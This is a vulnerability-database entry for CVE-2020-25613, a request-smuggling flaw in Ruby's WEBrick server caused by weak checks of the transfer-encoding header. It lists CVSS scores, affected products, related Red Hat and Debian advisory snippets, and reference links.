Published: 06/10/2020 Updated: 24/01/2024

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 445

Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

An issue exists in Ruby up to and including 2.5.8, 2.6.x up to and including 2.6.6, and 2.7.x up to and including 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.

Vulnerable Product	Search on Vulmon	Subscribe to Product
ruby-lang ruby
ruby-lang webrick
fedoraproject fedora 32
fedoraproject fedora 33

Synopsis Important: ruby:26 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for the ruby:26 module is now available for Red Hat Enterprise Linux 82 Extended Update SupportRed Hat Product Secu ...

Synopsis Important: ruby:26 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for the ruby:26 module is now available for Red Hat Enterprise Linux 81 Update Services for SAP SolutionsRed Hat Pr ...

Debian Bug report logs - #972230 CVE-2017-17742 CVE-2019-16201 CVE-2019-16254 CVE-2019-16255 CVE-2020-25613 Package: jruby; Maintainer for jruby is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Source for jruby is src:jruby (PTS, buildd, popcon) Reported by: Moritz Muehlenhoff <jmm@debianorg> ...

Debian Bug report logs - #830904 ITP: puppetserver -- the next-generation application for managing Puppet agents Package: wnpp; Maintainer for wnpp is wnpp@debianorg; Reported by: Mathieu Parent <sathieu@debianorg> Date: Tue, 12 Jul 2016 20:24:02 UTC Owned by: pollo@debianorg Severity: wishlist Fix blocked by 972230: ...

An issue was discovered in Ruby through 258, 26x through 266, and 27x through 271 WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request ...

The JSON gem through 220 for Ruby, as used in Ruby 24 through 249, 25 through 257, and 26 through 265, has an Unsafe Object Creation Vulnerability This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby Specifically, use of JSON parsing methods can lead to creation of a malicious object ...

CWE-444 https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7 https://hackerone.com/reports/965267 https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/https://security.netapp.com/advisory/ntap-20210115-0008/https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PFP3E7KXXT3H3KA6CBZPUOGA5VPFARRJ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTZURYROG3FFED3TYCQOBV66BS4K6WOV/https://security.gentoo.org/glsa/202401-27 https://access.redhat.com/errata/RHSA-2022:0582 https://nvd.nist.gov https://alas.aws.amazon.com/ALAS-2021-1468.html

CVE-2020-25613

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

References

Vulmon Search

About

Products

Connect